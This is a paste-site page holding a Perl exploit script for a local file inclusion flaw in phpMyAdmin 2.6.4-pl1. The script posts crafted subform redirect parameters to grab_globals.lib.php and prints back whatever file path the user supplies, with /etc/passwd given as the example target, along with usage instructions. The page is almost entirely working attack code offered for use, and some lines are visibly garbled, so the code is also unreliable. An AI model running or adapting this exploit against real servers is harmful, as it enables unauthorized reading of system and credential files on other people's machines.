PERL 30
Exploit phpmyadmin 2.6.4 Guest on 31st August 2020 12:46:04 PM
  1. #!/usr/bin/perl
  2. use IO::Socket;
  3.  
  4. # SecurityReason.com TEAM
  5. # Maksymilian Arciemowicz ( cXIb8O3 ) [email protected]
  6. #
  7. # Local file inclusion (./$FILE)
  8. # simple exploit phpMyAdmin 2.6.4-pl1
  9. #
  10. #
  11. # SecurityReason.com
  12.  
  13. if (@ARGV < 3)
  14. {
  15. print " SecurityReason TEAM ";
  16. print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1 ";
  17. print " ";
  18. print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE ";
  19. print "HOST - Host where is phpmyadmin example: http://localhost ";
  20. print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/ ";
  21. print "FILE - file to inclusion ../../../../../etc/passwd ";
  22. print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/
  23. ../../../../../etc/passwd ";
  24. exit();
  25. }
  26.  
  27. $HOST = $ARGV[0];
  28. $DIR = $ARGV[1]."libraries/grab_globals.lib.php";
  29. $FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][c
  30. XIb8O3]=1";
  31. $LENGTH = length $FILE;
  32.  
  33. print " ATTACK HOST IS: ".$HOST." ";
  34. $HOST =~ s/(http://)//;
  35.  
  36. $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80"
  37. ) || die "Error 404 ";
  38.  
  39. print $get1 "POST ".$DIR." HTTP/1.0 ";
  40. print $get1 "Host: ".%HOST." ";
  41. print $get1 "Content-Type: application/x-www-form-urlencoded ";
  42. print $get1 "Content-Length: ".$LENGTH." ";
  43.  
  44. print $get1 $FILE;
  45.  
  46. while ($odp = <$get1>)
  47. {
  48. if ($odp =~ /Warning: main(): Unable to access ./$ARGV[2] in / ) {
  49. printf " File ".$ARGV[2]." no exists. ";
  50. }
  51.  
  52. printf $odp;
  53. }

Paste is for source code and general debugging text.

Login or Register to edit, delete and keep track of your pastes and more.

Raw Paste

Login or Register to edit or fork this paste. It's free.